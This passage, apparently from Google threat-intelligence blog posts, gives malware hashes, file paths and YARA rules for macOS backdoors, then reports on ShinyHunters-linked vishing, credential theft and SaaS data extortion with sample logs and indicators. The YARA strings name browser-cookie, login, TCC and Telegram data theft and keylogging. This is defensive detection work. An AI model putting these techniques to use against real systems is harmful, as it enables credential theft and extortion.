overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table style="width: 201.958%;"><colgroup><col style="width: 9.50841%;"/><col style="width: 34.9288%;"/><col style="width: 55.4981%;"/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Description</span></strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">SHA-256 Hash</span></strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">File Name</span></strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DEEPBREATH</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b452C2da7c012eda25a1403b3313444b5eb7C2c3e25eee489f1bd256f8434735</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Library/Caches/System Settings</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SUGARLOADER</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1a30d6cdb0b98feed62563be8050db55ae0156ed437701d36a7b46aabf086ede</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Library/OSRecovery/SystemUpdater</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WAVESHAPER</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b525837273dde06b86b5f93f9aeC2C29665324105b0b66f6df81884754f8080d</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Library/Caches/com.apple.mond</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">HYPERCALL</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c8f7608d4e19f6cb03680941bbd09fe969668bcb09c7ca985048a22e014dffcd</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Library/SystemSettings/com.apple.system.settings</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CHROMEPUSH</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">603848f37ab932dccef98ee27e3c5af9221d3b6ccfe457ccf93cb572495ac325</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Users/&lt;user&gt;/Library/Application Support/Google/Chrome/NativeMessagingHosts/Brave Browser Docs</code></p> <p><code style="vertical-align: baseline;">/Users/&lt;user&gt;/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs</code></p> <p><code style="vertical-align: baseline;">/Library/Caches/chromeext</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SILENCELIFT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c3e5d878a30a6c46e22d1dd2089b32086c91f13f8b9c413aa84e1dbaa03b9375</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Library/Fonts/com.apple.logd</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">HYPERCALL configuration (executes itself with sudo)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">03f00a143b8929585c122d490b6a3895d639c17d92C2223917e3a9ca1b8d30f9</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/Library/SystemSettings/.CacheLogs.db</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>YARA Rules</h4></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_WAVESHAPER_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2025-11-03" date_modified = "2025-11-03" md5 = "c91725905b273e81e9cc6983a11c8d60" rev = 1 strings: $str1 = "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)" $str2 = "/tmp/.%s" $str3 = "grep \"Install Succeeded\" /var/log/install.log | awk '{print $1, $2}'" $str4 = "sysctl -n hw.model" $str5 = "sysctl -n machdep.cpu.brand_string" $str6 = "sw_vers --ProductVersion" condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_WAVESHAPER_2 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2025-11-03" date_modified = "2025-11-03" md5 = "eb7635f4836c9e0aa4c315b18b051cb5" rev = 1 strings: $str1 = "__Z10RunCommand" $str2 = "__Z11GenerateUID" $str3 = "__Z11GetResponse" $str4 = "__Z13WriteCallback" $str5 = "__Z14ProcessRequest" $str6 = "__Z14SaveAndExecute" $str7 = "__Z16MakeStatusString" $str8 = "__Z24GetCurrentExecutablePath" $str9 = "__Z7Execute" condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Downloader_HYPERCALL_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2025-10-24" date_modified = "2025-10-24" rev = 1 strings: $go_build = "Go build ID:" $go_inf = "Go buildinf:" $lib1 = "/inject_mac/inject.go" $lib2 = "github.com/gorilla/websocket" $func1 = "t_loader/inject_mac.Inject" $func2 = "t_loader/common.rc4_decode" $c1 = { 48 BF 00 AC 23 FC 06 00 00 00 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 32 48 8B 52 ?? 48 8B 76 ?? 48 89 CF 48 89 D9 48 89 C3 48 89 D0 FF D6 } $c2 = { 48 89 D6 48 F7 EA 48 01 DA 48 01 CA 48 C1 FA 1A 48 C1 FE 3F 48 29 F2 48 69 D2 00 E1 F5 05 48 29 D3 48 8D 04 19 } condition: (uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe) and all of ($go*) and any of ($lib*) and any of ($func*) and all of ($c*) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_SILENCELIFT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" md5 = "4e4f2dfe143ba261fd8a18d1c4b58f2e" date_created = "2025/10/23" date_modified = "2025/10/28" rev = 2 strings: $ss1 = "/usr/libexec/PlistBuddy -c \"print :IOConsoleUsers:0:CGSSessionScreenIsLocked\" /dev/stdin 2&gt;/dev/null &lt;&lt;&lt; \"$(ioreg -n Root -d1 -a)\"" ascii fullword $ss2 = "pkill -CONT -f" ascii fullword $ss3 = "pkill -STOP -f" ascii fullword $ss4 = "/Library/Caches/.Logs.db" ascii fullword $ss5 = "/Library/Caches/.evt_" $ss6 = "{\"bot_id\":\"" $ss7 = "\", \"status\":" $ss8 = "/Library/Fonts/.analyzed" ascii fullword condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APTFIN_Downloader_SUGARLOADER_1 { meta: author = "Google Threat Intelligence Group (GTIG)" md5 = "3712793d3847dd0962361aa528fa124c" date_created = "2025/10/15" date_modified = "2025/10/15" rev = 1 strings: $ss1 = "/Library/OSRecovery/com.apple.os.config" $ss2 = "/Library/Group Containers/OSRecovery" $ss4 = "_wolfssl_make_rng" condition: all of them }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APTFIN_Downloader_SUGARLOADER_2 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $m1 = "__mod_init_func\x00lko2\x00" $m2 = "__mod_term_func\x00lko2\x00" $m3 = "/usr/lib/libcurl.4.dylib" condition: (uint32(0) == 0xfeedface or uint32(0) == 0xfeedfacf or uint32(0) == 0xcefaedfe or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe) and (all of ($m1, $m2, $m3)) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Datamine_DEEPBREATH_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $sa1 = "-fakedel" $sa2 = "-autodat" $sa3 = "-datadel" $sa4 = "-extdata" $sa5 = "TccClickJack" $sb1 = "com.apple.TCC\" as alias" $sb2 = "/TCC.db\" as alias" $sc1 = "/group.com.apple.notes\") as alias" $sc2 = ".keepcoder.Telegram\")" $sc3 = "Support/Google/Chrome/\")" $sc4 = "Support/BraveSoftware/Brave-Browser/\")" $sc5 = "Support/Microsoft Edge/\")" $sc6 = "&amp; \"/Local Extension Settings\"" $sc7 = "&amp; \"/Cookies\"" $sc8 = "&amp; \"/Login Data\"" $sd1 = "\"cp -rf \" &amp; quoted form of " condition: (uint32(0) == 0xfeedfacf) and 2 of ($sa*) and 2 of ($sb*) and 3 of ($sc*) and 1 of ($sd*) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Datamine_CHROMEPUSH_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2025-11-06" date_modified = "2025-11-06" rev = 1 strings: $s1 = "%s/CA%02d%02d%02d%02d%02d%02d.dat" $s2 = "%s/tmpCA.dat" $s3 = "mouseStates" $s4 = "touch /Library/Caches/.evt_" $s5 = "cp -f" $s6 = "rm -rf" $s7 = "keylogs" $s8 = "%s/KL%02d%02d%02d%02d%02d%02d.dat" $s9 = "%s/tmpKL.dat" $s10 = "OK: Create data.js success" condition: (uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcafebabf or uint32(0) == 0xbfbafeca) and 8 of them }</code></pre></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Google Security Operations (SecOps)</span></h3> <p><span style="vertical-align: baseline;">Google SecOps customers have access to these broad category rules and more under the “Mandiant Intel Emerging Threats” and “Mandiant Hunting Rules” rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Application Support com.apple Suspicious Filewrites</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Chrome Native Messaging Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Chrome Service Worker Directory Deletion</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Database Staging in Library Caches</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">macOS Chrome Extension Modification</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">macOS Notes Database Harvesting</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">macOS TCC Database Manipulation</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Access To macOS Web Browser Credentials</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Audio Hardware Fingerprinting</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Keychain Interaction</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Library Font Directory File Write</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Multi-Stage Payload Loader</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Permissions on macOS System File</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious SoftwareUpdate Masquerading</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious TCC Database Modification</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Web Downloader Pipe to ZSH</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Telegram Session Data Staging</span></p> </li> </ul></div>Mon, 09 Feb 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering/Mandiant https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Mandiant has identified an expansion in threat activity that uses tactics, techniques, and procedures (TTPs) consistent with prior ShinyHunters-branded extortion operations. These operations primarily leverage sophisticated voice phishing (vishing) and victim-branded credential harvesting sites to gain initial access to corporate environments by obtaining single sign-on (SSO) credentials and multi-factor authentication (MFA) codes. Once inside, the threat actors target cloud-based software-as-a-service (SaaS) applications to exfiltrate sensitive data and internal communications for use in subsequent extortion demands.</span></p> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) is currently tracking this activity under multiple threat clusters (UNC6661, UNC6671, and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion"><span style="text-decoration: underline; vertical-align: baseline;">UNC6240</span></a><span style="vertical-align: baseline;">) to enable a more granular understanding of evolving partnerships and account for potential impersonation activity. While this methodology of targeting identity providers and SaaS platforms is consistent with our prior observations of threat activity preceding ShinyHunters-branded extortion, the breadth of targeted cloud platforms continues to expand as these threat actors seek more sensitive data for extortion. <span style="vertical-align: baseline;">Further, they appear to be escalating their extortion tactics with recent incidents including harassment of victim personnel, among other tactics</span></span><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, it continues to highlight the effectiveness of social engineering and underscores the importance of organizations </span><a href="https://workspace.google.com/blog/identity-and-security/defending-against-account-takeovers-top-threats-passkeys-and-dbsc" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">moving towards phishing-resistant MFA</span></a><span style="vertical-align: baseline;"> where possible. Methods such as FIDO2 security keys or passkeys are resistant to social engineering in ways that push-based or SMS authentication are not.</span></p> <p><span style="vertical-align: baseline;">Mandiant has also published a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas"><span style="text-decoration: underline; vertical-align: baseline;">comprehensive guide with proactive hardening and detection recommendations</span></a><span style="vertical-align: baseline;">, and Google published a </span><a href="https://security.googlecloudcommunity.com/community-blog-42/new-to-google-secops-leveraging-okta-curated-detections-to-detect-shinyhunters-related-activity-6693" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">detailed walkthrough for operationalizing these findings</span></a><span style="vertical-align: baseline;"> within Google Security Operations. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vishing-shinyhunters-fig1-white.max-1000x1000.png" alt="attack path diagram"> </a> <figcaption class="article-image__caption "><p data-block-key="e0hj0">Figure 1: Attack path diagram</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">UNC6661 Vishing and Credential Theft Activity</span></h3> <p><span style="vertical-align: baseline;">In incidents spanning early to mid-January 2026, UNC6661 pretended to be IT staff and called employees at targeted victim organizations claiming that the company was updating MFA settings. The threat actor directed the employees to victim-branded credential harvesting sites to capture their SSO credentials and MFA codes, and then registered their own device for MFA. The credential harvesting domains attributed to UNC6661 commonly, but not exclusively, use the format &lt;companyname&gt;sso.com or &lt;companyname&gt;internal.com and have often been registered with NICENIC.</span></p> <p><span style="vertical-align: baseline;">In at least some cases, the threat actor gained access to accounts belonging to Okta customers. Okta </span><a href="https://www.okta.com/blog/threat-intelligence/phishing-kits-adapt-to-the-script-of-callers/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">published</span></a><span style="vertical-align: baseline;"> a report about phishing kits targeting identity providers and cryptocurrency platforms, as well as follow-on vishing attacks. While they associate this activity with multiple threat clusters, at least some of the activity appears to overlap with the ShinyHunters-branded operations tracked by GTIG.</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">After gaining initial access, UNC6661 moved laterally through victim customer environments to exfiltrate data from various SaaS platforms (log examples in Figures 2 through 5). While the targeting of specific organizations and user identities is deliberate, analysis suggests that the subsequent access to these platforms is likely opportunistic, determined by the specific permissions and applications accessible via the individual compromised SSO session. These compromises did not result from security vulnerabilities in the vendors' products or infrastructure.</span></p> <p><span style="vertical-align: baseline;">In some cases, they have appeared to target specific types of information. For example, the threat actors have conducted searches in cloud applications for documents containing specific text including "poc," "confidential," "internal," "proposal," "salesforce," and "vpn" or targeted personally identifiable information (PII) stored in Salesforce. Additionally, UNC6661 may have targeted Slack data at some victims' environments, based on a claim made in a ShinyHunters-branded data leak site (DLS) entry.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "AppAccessContext": { "AADSessionId": "[REDACTED_GUID]", "AuthTime": "1601-01-01T00:00:00", "ClientAppId": "[REDACTED_APP_ID]", "ClientAppName": "Microsoft Office", "CorrelationId": "[REDACTED_GUID]", "TokenIssuedAtTime": "1601-01-01T00:02:56", "UniqueTokenId": "[REDACTED_ID]" }, "CreationTime": "2026-01-10T13:17:11", "Id": "[REDACTED_GUID]", "Operation": "FileDownloaded", "OrganizationId": "[REDACTED_GUID]", "RecordType": 6, "UserKey": "[REDACTED_USER_KEY]", "UserType": 0, "Version": 1, "Workload": "SharePoint", "ClientIP": "[REDACTED_IP]", "UserId": "[REDACTED_EMAIL]", "ApplicationId": "[REDACTED_APP_ID]", "AuthenticationType": "OAuth", "BrowserName": "Mozilla", "BrowserVersion": "5.0", "CorrelationId": "[REDACTED_GUID]", "EventSource": "SharePoint", "GeoLocation": "NAM", "IsManagedDevice": false, "ItemType": "File", "ListId": "[REDACTED_GUID]", "ListItemUniqueId": "[REDACTED_GUID]", "Platform": "WinDesktop", "Site": "[REDACTED_GUID]", "UserAgent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.4294", "WebId": "[REDACTED_GUID]", "DeviceDisplayName": "[REDACTED_IPV6]", "EventSignature": "[REDACTED_SIGNATURE]", "FileSizeBytes": 31912, "HighPriorityMediaProcessing": false, "ListBaseType": 1, "ListServerTemplate": 101, "SensitivityLabelId": "[REDACTED_GUID]", "SiteSensitivityLabelId": "", "SensitivityLabelOwnerEmail": "[REDACTED_EMAIL]", "SourceRelativeUrl": "[REDACTED_RELATIVE_URL]", "SourceFileName": "[REDACTED_FILENAME]", "SourceFileExtension": "xlsx", "ApplicationDisplayName": "Microsoft Office", "SiteUrl": "[REDACTED_URL]", "ObjectId": "[REDACTED_URL]/[REDACTED_FILENAME]" }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 2: <span style="vertical-align: baseline;">SharePoint/M365 log example</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>"Login","20260120163111.430","SLB:[REDACTED]","[REDACTED]","[REDACTED]","192","25","/index.jsp","","1jVcuDh1VIduqg10","Standard","","167158288","5","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/IP_ADDRESS_REMOVED Safari/537.36","","9998.0","user@[REDACTED_DOMAIN].com","TLSv1.3","TLS_AES_256_GCM_SHA384","","https://[REDACTED_IDP_DOMAIN]/","[REDACTED].my.salesforce.com","CA","","","0LE1Q000000LBVK","2026-01-20T16:31:11.430Z","[REDACTED]","76.64.54[.]159","","LOGIN_NO_ERROR","76.64.54[.]159",""</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 3: <span style="vertical-align: baseline;">Salesforce log example</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "Timestamp": "2026-01-21T12:5:2-03:00", "Timestamp UTC": "[REDACTED]", "Event Name": "User downloads documents from an envelope", "Event Id": "[REDACTED_EVENT_ID]", "User": "[REDACTED]@example.com", "User Id": "[REDACTED_USER_ID]", "Account": "[REDACTED_ORG_NAME]", "Account Id": "[REDACTED_ACCOUNT_ID]", "Integrator Key": "[REDACTED_KEY]", "IP Address": "73.135.228[.]98", "Latitude": "[REDACTED]", "Longitude": "[REDACTED]", "Country/Region": "United States", "State": "Maryland", "City": "[REDACTED]", "Browser": "Chrome 143", "Device": "Apple Mac", "Operating System": "Mac OS X 10", "Source": "Web", "DownloadType": "Archived", "EnvelopeId": "[REDACTED_ENVELOPE_ID]" }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 4: <span style="vertical-align: baseline;">Docusign log example</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In at least one incident where the threat actor gained access to an Okta customer account, UNC6661 enabled the </span><a href="https://www.tooglebox.com/features/email-recall" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">ToogleBox Recall</span></a><span style="vertical-align: baseline;"> add-on for the victim's Google Workspace account, a tool designed to search for and permanently delete emails. They then deleted a "Security method enrolled" email from Okta, almost certainly to prevent the employee from identifying that their account was associated with a new MFA device.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "Date": "2026-01-11T06:3:00Z", "App ID": "[REDACTED_ID].apps.googleusercontent.com", "App name": "ToogleBox Recall", "OAuth event": "Authorize", "Description": "User authorized access to ToogleBox Recall for specific Gmail and Apps Script scopes.", "User": "user@[REDACTED_DOMAIN].com", "Scope": "https://www.googleapis.com/auth/gmail.addons.current.message.readonly, https://www.googleapis.com/auth/gmail.addons.execute, https://www.googleapis.com/auth/script.external_request, https://www.googleapis.com/auth/script.locale, https://www.googleapis.com/auth/userinfo.email", "API name": "", "Method": "", "Number of response bytes": "0", "IP address": "149.50.97.144", "Product": "Gmail, Apps Script Runtime, Apps Script Api, Identity, Unspecified", "Client type": "Web", "Network info": "{\n \"Network info\": {\n \"IP ASN\": \"201814\",\n \"Subdivision code\": \"\",\n \"Region code\": \"PL\"\n }\n}" }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 5: <span style="vertical-align: baseline;">ToogleBox Recall auth log entry example</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In at least one case, after conducting the initial data theft, UNC6661 used their newly obtained access to compromised email accounts to send additional phishing emails to contacts at cryptocurrency-focused companies. The threat actor then deleted the outbound emails, likely in an attempt to obfuscate their malicious activity.</span></p> <p><span style="vertical-align: baseline;">GTIG attributes the subsequent extortion activity following UNC6661 intrusions to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion"><span style="text-decoration: underline; vertical-align: baseline;">UNC6240</span></a><span style="vertical-align: baseline;">, based on several overlaps, including the use of a common Tox account for negotiations, ShinyHunters-branded extortion emails, and Limewire to host samples of stolen data. In mid-January 2026 extortion emails, UNC6240 outlined what data they allegedly stole, specifying a payment amount and destination BTC address, and threatening consequences if the ransom was not paid within 72 hours, which is consistent with prior extortion emails (Figure 6). They also provided proof of data theft via samples hosted on Limewire. GTIG also observed extortion text messages sent to employees and received reports of victim websites being targeted with distributed denial-of-service (DDoS) attacks.</span></p> <p><span style="vertical-align: baseline;">Notably, in late January 2026 a new ShinyHunters-branded DLS named "SHINYHUNTERS" emerged listing several alleged victims who may have been compromised in these most recent extortion operations. The DLS also lists contact information (shinycorp@tutanota[.]com, shinygroup@onionmail[.]com) that have previously been associated with UNC6240.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vishing-shinyhunters-fig6.max-1000x1000.png" alt="Ransom note extract"> </a> <figcaption class="article-image__caption "><p data-block-key="e0hj0">Figure 6: Ransom note extract</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Similar Activity Conducted by UNC6671</span></h3> <p><span style="vertical-align: baseline;">Also beginning in early January 2026, UNC6671 conducted vishing operations masquerading as IT staff and directing victims to enter their credentials and MFA authentication codes on a victim-branded credential harvesting site. The credential harvesting domains used the same structure as UNC6661, but were more often registered using Tucows. In at least some cases, the threat actors have gained access to Okta customer accounts. Mandiant has also observed evidence that UNC6671 leveraged PowerShell to download sensitive data from SharePoint and OneDrive. <span style="vertical-align: baseline;">While many of these TTPs are consistent with UNC6661, an extortion email stemming from UNC6671 activity was unbranded and used a different Tox ID for further contact. The threat actors employed aggressive extortion tactics following UNC6671 intrusions, including harassment of victim personnel. The extortion tactics and difference in domain registrars suggests that separate individuals may be involved with these sets of activity</span>.</span></p> <h3><span style="vertical-align: baseline;">Remediation and Hardening</span></h3> <p><span style="vertical-align: baseline;">Mandiant has published a comprehensive guide with </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defense-against-shinyhunters-cybercrime-saas"><span style="text-decoration: underline; vertical-align: baseline;">proactive hardening and detection recommendations</span></a><span style="vertical-align: baseline;">.</span></p> <h3><span style="vertical-align: baseline;">Outlook and Implications</span></h3> <p><span style="vertical-align: baseline;">This recent activity is similar to prior operations associated with UNC6240, which have frequently used vishing for initial access and have <a href="https://www.salesforce.com/blog/protecting-salesforce-data-after-an-identity-compromise/" rel="noopener" target="_blank">targeted Salesforce data</a>. It does, however, represent an expansion in the number and type of targeted cloud platforms, suggesting that the associated threat actors are modifying their operations to gather more sensitive data for extortion operations. Further, the use of a compromised account to send phishing emails to cryptocurrency-related entities suggests that associated threat actors may be building relationships with potential victims to expand their access or engage in other follow-on operations. Notably, this portion of the activity appears operationally distinct, given that it appears to target individuals instead of organizations.</span></p> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, 